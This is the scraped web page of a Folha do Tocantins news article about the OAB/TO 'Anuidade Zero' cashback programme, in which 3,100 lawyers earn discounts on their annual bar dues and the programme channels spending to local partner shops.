content="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163.jpg">
												<meta itemprop="width" content="900">
												<meta itemprop="height" content="600">
											</div><!--mvp-post-feat-img-->
																																																														<div id="mvp-content-wrap" class="left relative">
									<div class="mvp-post-soc-out right relative">
																				<div class="mvp-post-soc-in">
											<div id="mvp-content-body" class="left relative">
												<div id="mvp-content-body-top" class="left relative">
																																							<div id="mvp-content-main" class="left relative">
														<div style='clear: both'></div><div  class='the_champ_sharing_container the_champ_horizontal_sharing' super-socializer-data-href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"><div class='the_champ_sharing_title' style="font-weight:bold" ></div><ul class="the_champ_sharing_ul"><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Whatsapp" Title="Whatsapp" class="theChampSharing theChampWhatsappBackground" onclick='theChampPopup("https://web.whatsapp.com/send?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021 https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block" class="theChampSharingSvg theChampWhatsappSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Facebook" Title="Facebook" class="theChampSharing theChampFacebookBackground" onclick='theChampPopup("https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Facebook Messenger" Title="Facebook Messenger" class="theChampSharing theChampFacebookMessengerBackground" onclick='theChampPopup("https://www.facebook.com/dialog/send?app_id=595489497242932&display=popup&link=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F&redirect_uri=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookMessengerSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Twitter" Title="Twitter" class="theChampSharing theChampTwitterBackground" onclick='theChampPopup("http://twitter.com/intent/tweet?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021&url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampTwitterSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" alt="Copy Link" Title="Copy Link" class="theChampSharing theChampCopyLinkBackground"><ss style="display:block;" class="theChampSharingSvg theChampCopyLinkSvg"></ss></i></li><li class="theChampSharingRound"><i style="width:40px;height:40px;border-radius:5px;" title="More" alt="More" class="theChampSharing theChampMoreBackground" onclick="theChampMoreSharingPopup(this, 'https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/', 'OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021', '')" ><ss style="display:block" class="theChampSharingSvg theChampMoreSvg"></ss></i></li></ul><div style="clear:both"></div></div><div style='clear: both'></div><div class="g g-2"><div class="g-dyn a-1 c-1"><center><a title="Divulgação" href="#" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/11/campanha-aftosa.gif" /></a></center></div></div><p>O advogado Rafael Elias Nicotera Abraão é o exemplo mais bem-sucedido do programa. Desde a implantação do Anuidade Zero, no final de 2019, Rafael Elias conseguiu acumular o total de R$ 3.277,64 em cash back. Esse valor poderá ser usado para a quitação integral de sua anuidade na OAB/TO. Mesmo Rafael usando o que acumulou em cash back no programa para quitar sua anuidade, ele ainda terá quase R$ 2.300,00 em saldo para ser usado no pagamento de anuidades futuras. Há uma sugestão que será levada ao Conselho da OAB/TO para que esse valor acumulado em cash back também seja autorizado o uso para pagamento de taxas administrativas dentro do sistema OAB/TO. Essa iniciativa ainda precisa ser analisada pelo Conselho antes de ser colocada em prática.</p>
<p>Ao todo, o programa movimentou R$ 102.215,08 nos últimos 12 meses em anuidades. Um avanço administrativo bastante comemorado pela atual gestão.</p>
<p>“O programa Anuidade Zero é um grande sucesso. Cumprimos o compromisso que assumimos com a advocacia durante nossa campanha e implantamos esse projeto que sem dúvida é um importante passo para o avanço para a modernização do sistema OAB Tocantins”, comemora o presidente da Ordem no Estado, Gedeon Pitaluga.</p>
<p>Além de ser uma ferramenta que modernizou a gestão financeira da OAB/TO, o programa Anuidade Zero é o melhor e mais eficiente benefício de descontos no pagamento da anuidade da Ordem que o advogado tocantinense conquistou desde a fundação da instituição no Tocantins.</p>
<p>“O Anuidade Zero é um benefício direto que a OAB/TO criou para auxiliar o advogado e a advogada no pagamento da sua anuidade”, ponderou Pitaluga.</p>
<p><strong>Fortalecimento do comércio</strong></p>
<p>Outro ponto que também deve ser destacado é a quantia que o Anuidade Zero representou em movimentação e compras nas lojas credenciadas. Ao todo foram R$ 1.255.178,46 em compras feitas por advogados e advogadas nas empresas cadastradas no programa, uma forma da OAB/TO incentivar e promover a economia tocantinenses por meio das lojas parceiras do aplicativo. “Esse é valor social que o projeto também tem em sua concepção. A proposta, além de levar um benefício direto para a advocacia, é também de incentivar a economia local”, pontuou Gedeon Pitaluga.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<!-- Either there are no banners, they are disabled or none qualified for this location! --><div class='the_champ_sharing_container the_champ_vertical_sharing the_champ_hide_sharing the_champ_bottom_sharing' style='width:44px;left: -10px;top: 100px;-webkit-box-shadow:none;box-shadow:none;' super-socializer-data-href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"><ul class="the_champ_sharing_ul"><li class=""><i style="width:40px;height:40px;margin:0;" alt="Facebook" Title="Facebook" class="theChampSharing theChampFacebookBackground" onclick='theChampPopup("https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampFacebookSvg"></ss></i></li><li class=""><i style="width:40px;height:40px;margin:0;" alt="Whatsapp" Title="Whatsapp" class="theChampSharing theChampWhatsappBackground" onclick='theChampPopup("https://web.whatsapp.com/send?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021 https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block" class="theChampSharingSvg theChampWhatsappSvg"></ss></i></li><li class=""><i style="width:40px;height:40px;margin:0;" alt="Twitter" Title="Twitter" class="theChampSharing theChampTwitterBackground" onclick='theChampPopup("http://twitter.com/intent/tweet?text=OAB%2FTO%3A%20Anuidade%20Zero%3A%203%2C1%20mil%20advogados%20e%20advogadas%20aderem%20programa%20e%20ter%C3%A3o%20desconto%20em%202021&url=https%3A%2F%2Ffolhadotocantins.com.br%2Foab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021%2F")'><ss style="display:block;" class="theChampSharingSvg theChampTwitterSvg"></ss></i></li></ul><div style="clear:both"></div></div>																											</div><!--mvp-content-main-->
													<div id="mvp-content-bot" class="left">
																												<div class="mvp-post-tags">
															<span class="mvp-post-tags-header">Related Topics:</span><span itemprop="keywords"></span>
														</div><!--mvp-post-tags-->
														<div class="posts-nav-link">
																													</div><!--posts-nav-link-->
																													<div id="mvp-prev-next-wrap" class="left relative">
																																	<div class="mvp-next-post-wrap right relative">
																		<a href="https://folhadotocantins.com.br/165497-2/" rel="bookmark">
																		<div class="mvp-prev-next-cont left relative">
																			<div class="mvp-next-cont-out left relative">
																				<div class="mvp-next-cont-in">
																					<div class="mvp-prev-next-text left relative">
																						<span class="mvp-prev-next-label left relative">Up Next</span>
																						<p>Secretaria de Saúde de Gurupi entrega vacinas contra Covid-19 ao HRG</p>
																					</div><!--mvp-prev-next-text-->
																				</div><!--mvp-next-cont-in-->
																				<span class="mvp-next-arr fa fa-chevron-right right"></span>
																			</div><!--mvp-prev-next-out-->
																		</div><!--mvp-prev-next-cont-->
																		</a>
																	</div><!--mvp-next-post-wrap-->
																																																	<div class="mvp-prev-post-wrap left relative">
																		<a href="https://folhadotocantins.com.br/pandemia-prejuizos-emocionais-serao-evitados-com-volta-das-aulas-presenciaisopinam-educadores/" rel="bookmark">
																		<div class="mvp-prev-next-cont left relative">
																			<div class="mvp-prev-cont-out right relative">
																				<span class="mvp-prev-arr fa fa-chevron-left left"></span>
																				<div class="mvp-prev-cont-in">
																					<div class="mvp-prev-next-text left relative">
																						<span class="mvp-prev-next-label left relative">Don&#039;t Miss</span>
																						<p>PANDEMIA: Prejuízos emocionais serão evitados com volta das aulas presenciais,opinam educadores</p>
																					</div><!--mvp-prev-next-text-->
																				</div><!--mvp-prev-cont-in-->
																			</div><!--mvp-prev-cont-out-->
																		</div><!--mvp-prev-next-cont-->
																		</a>
																	</div><!--mvp-prev-post-wrap-->
																															</div><!--mvp-prev-next-wrap-->
																																										<div class="mvp-org-wrap" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
															<div class="mvp-org-logo" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
																																	<img src="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png"/>
																	<meta itemprop="url" content="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png">
																															</div><!--mvp-org-logo-->
															<meta itemprop="name" content="Folha do Tocantins">
														</div><!--mvp-org-wrap-->
													</div><!--mvp-content-bot-->
												</div><!--mvp-content-body-top-->
												<div class="mvp-cont-read-wrap">
																																																																																	<div id="mvp-comments-button" class="left relative mvp-com-click">
																<span class="mvp-comment-but-text">Click to comment</span>
															</div><!--mvp-comments-button-->
															<div id="comments" class="mvp-com-click-id-36534 mvp-com-click-main">
				
	
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><h4 class="mvp-widget-home-title"><span class="mvp-widget-home-title">Leave a Reply</span></h4> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="https://folhadotocantins.com.br/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes"><span id="email-notes">O seu endereço de e-mail não será publicado.</span></p><p class="comment-form-comment"><label for="comment">Comentário</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Nome</label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" /></p>
<p class="comment-form-email"><label for="email">E-mail</label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" /></p>
<p class="comment-form-url"><label for="url">Site</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='36534' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="9ade6da289" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="132"/></p></form>	</div><!-- #respond -->
	
</div><!--comments-->																																							</div><!--mvp-cont-read-wrap-->
											</div><!--mvp-content-body-->
										</div><!--mvp-post-soc-in-->
									</div><!--mvp-post-soc-out-->
								</div><!--mvp-content-wrap-->
													</div><!--mvp-post-content-->
						</div><!--mvp-post-main-in-->
													<div id="mvp-side-wrap" class="left relative theiaStickySidebar">
						<section id="adrotate_widgets-19" class="mvp-side-widget adrotate_widgets"><div class="a-single a-4"><center><a title="Consumo Consiente de Água" href="https://consumoconsciente.brkambiental.com.br/" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/08/brk_-_300x250px_04-1.gif" /></a></center></div></section><section id="adrotate_widgets-10" class="mvp-side-widget adrotate_widgets"><div class="g g-5"><div class="g-col b-5 a-7"><center><a title="Divulgação" href="https://www.campelo.com.br/campelo-club/campelo_club.php" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/11/gif-estado-corona-2020.gif" /></a></center>
</div></div><div class="g g-5"><div class="g-col b-5 a-11"><center><a title="Divulgação" href="#" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/300x250-1.gif" /></a></center></div></div><div class="g g-5"><div class="g-col b-5 a-5"><center><a title="Divulgação" href="#" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/pref-palmas-dez.gif" /></a></center></div></div></section><section id="mvp_flex_widget-2" class="mvp-side-widget mvp_flex_widget"><div class="mvp-widget-home-head"><h4 class="mvp-widget-home-title"><span class="mvp-widget-home-title">Cidades</span></h4></div>
		<div class="mvp-widget-flex-wrap left relative">
									<div class="mvp-flex-story-wrap left relative">
																																		<a href="https://folhadotocantins.com.br/a-violencia-fisica-contra-a-mulher-nao-acontece-isoladamente-e-precisa-ser-denunciada/" rel="bookmark">
																					<div class="mvp-flex-story left relative mvp-flex-row">
																																	<div class="mvp-flex-story-out right relative">
													<div class="mvp-flex-story-img left relative">
														<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />														<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																											</div><!--mvp-flex-story-img--->
													<div class="mvp-flex-story-in">
														<div class="mvp-flex-story-text left relative">
															<div class="mvp-cat-date-wrap left relative">
																<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">3 horas ago</span>
															</div><!--mvp-cat-date-wrap-->
															<h2 class="mvp-stand-title">A violência física contra a mulher não acontece isoladamente e precisa ser denunciada</h2>
															<p>Dados revelam que a violência física contra a mulher estão diretamente relacionadas aos companheiros, cônjuges e ex-companheiros das vítimas</p>
														</div><!--mvp-flex-story-text--->
													</div><!--mvp-flex-story-in-->
												</div><!--mvp-flex-story-out-->
																					</div><!--mvp-flex-story-->
										</a>
																			<a href="https://folhadotocantins.com.br/165497-2/" rel="bookmark">
																					<div class="mvp-flex-story left relative mvp-flex-row">
																																	<div class="mvp-flex-story-out right relative">
													<div class="mvp-flex-story-img left relative">
														<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />														<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																											</div><!--mvp-flex-story-img--->
													<div class="mvp-flex-story-in">
														<div class="mvp-flex-story-text left relative">
															<div class="mvp-cat-date-wrap left relative">
																<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">3 horas ago</span>
															</div><!--mvp-cat-date-wrap-->
															<h2 class="mvp-stand-title">Secretaria de Saúde de Gurupi entrega vacinas contra Covid-19 ao HRG</h2>
															<p>A Secretaria Municipal de Saúde de Gurupi entregou na tarde desta quinta-feira (21), as doses que serão aplicadas nos profissionais...</p>
														</div><!--mvp-flex-story-text--->
													</div><!--mvp-flex-story-in-->
												</div><!--mvp-flex-story-out-->
																					</div><!--mvp-flex-story-->
										</a>
																			<a href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/" rel="bookmark">
																					<div class="mvp-flex-story left relative mvp-flex-row">
																																	<div class="mvp-flex-story-out right relative">
													<div class="mvp-flex-story-img left relative">
														<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />														<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																											</div><!--mvp-flex-story-img--->
													<div class="mvp-flex-story-in">
														<div class="mvp-flex-story-text left relative">
															<div class="mvp-cat-date-wrap left relative">
																<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">7 horas ago</span>
															</div><!--mvp-cat-date-wrap-->
															<h2 class="mvp-stand-title">OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021</h2>
															<p>Um advogado acumulou mais de R$ 3 mil em cash back com o programa. Saldo acumulado é o bastante para...</p>
														</div><!--mvp-flex-story-text--->
													</div><!--mvp-flex-story-in-->
												</div><!--mvp-flex-story-out-->
																					</div><!--mvp-flex-story-->
										</a>
																			<a href="https://folhadotocantins.com.br/pandemia-prejuizos-emocionais-serao-evitados-com-volta-das-aulas-presenciaisopinam-educadores/" rel="bookmark">
																					<div class="mvp-flex-story left relative mvp-flex-row">
																																	<div class="mvp-flex-story-out right relative">
													<div class="mvp-flex-story-img left relative">
														<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />														<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																											</div><!--mvp-flex-story-img--->
													<div class="mvp-flex-story-in">
														<div class="mvp-flex-story-text left relative">
															<div class="mvp-cat-date-wrap left relative">
																<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">8 horas ago</span>
															</div><!--mvp-cat-date-wrap-->
															<h2 class="mvp-stand-title">PANDEMIA: Prejuízos emocionais serão evitados com volta das aulas presenciais,opinam educadores</h2>
															<p>Diversas escolas particulares passam a adotar o ensino híbrido a partir de fevereiro</p>
														</div><!--mvp-flex-story-text--->
													</div><!--mvp-flex-story-in-->
												</div><!--mvp-flex-story-out-->
																					</div><!--mvp-flex-story-->
										</a>
																			<a href="https://folhadotocantins.com.br/em-mateiros-dimbarre-assume-sedematur-e-destaca-objetivos-para-desenvolvimento-do-turismo/" rel="bookmark">
																					<div class="mvp-flex-story left relative mvp-flex-row">
																																	<div class="mvp-flex-story-out right relative">
													<div class="mvp-flex-story-img left relative">
														<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />														<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																											</div><!--mvp-flex-story-img--->
													<div class="mvp-flex-story-in">
														<div class="mvp-flex-story-text left relative">
															<div class="mvp-cat-date-wrap left relative">
																<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">8 horas ago</span>
															</div><!--mvp-cat-date-wrap-->
															<h2 class="mvp-stand-title">EM MATEIROS: Dimbarre assume Sedematur e destaca objetivos para desenvolvimento do Turismo</h2>
															<p>A convite feito pelo prefeito Pastor João, Maicon Dimbarre assume a pasta. O novo secretário reside no Tocantins desde 2018...</p>
														</div><!--mvp-flex-story-text--->
													</div><!--mvp-flex-story-in-->
												</div><!--mvp-flex-story-out-->
																					</div><!--mvp-flex-story-->
										</a>
																														</div><!--mvp-flex-story-wrap-->
					</div><!--mvp-widget-flex-wrap-->

		</section><section id="adrotate_widgets-17" class="mvp-side-widget adrotate_widgets"><div class="g g-6"><div class="g-col b-6 a-2"><center><a title="ATM" href="#" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/atm-dez.gif" /></a></center></div></div><div class="g g-6"><div class="g-col b-6 a-6"><center><a title="WR" href="#"_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/wr-dez.gif" /></a></center></div></div><div class="g g-6"><div class="g-col b-6 a-9"><center><a title="Divulgação" href="#" target="_blank" rel="noopener noreferrer nofollow"><img src="https://folhadotocantins.com.br/wp-content/uploads/2020/10/estado-dez.gif" /></a></center></div></div></section>			</div><!--mvp-side-wrap-->											</div><!--mvp-post-main-out-->
				</div><!--mvp-post-main-->
							<div id="mvp-post-more-wrap" class="left relative">
					<h4 class="mvp-widget-home-title">
						<span class="mvp-widget-home-title">Mais Lidas</span>
					</h4>
					<ul class="mvp-post-more-list left relative">
													<a href="https://folhadotocantins.com.br/0651651968-2/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-91-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">3 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Sine nesta terça (19), oferece 78 em Porto Nacional, 29 em Gurupi e 207 vagas em Palmas; no total são 497 vagas no Estado</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/secretaria-da-saude-prefeitura-de-palmas-recebe-3-331-doses-da-vacina-contra-a-covid-19/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
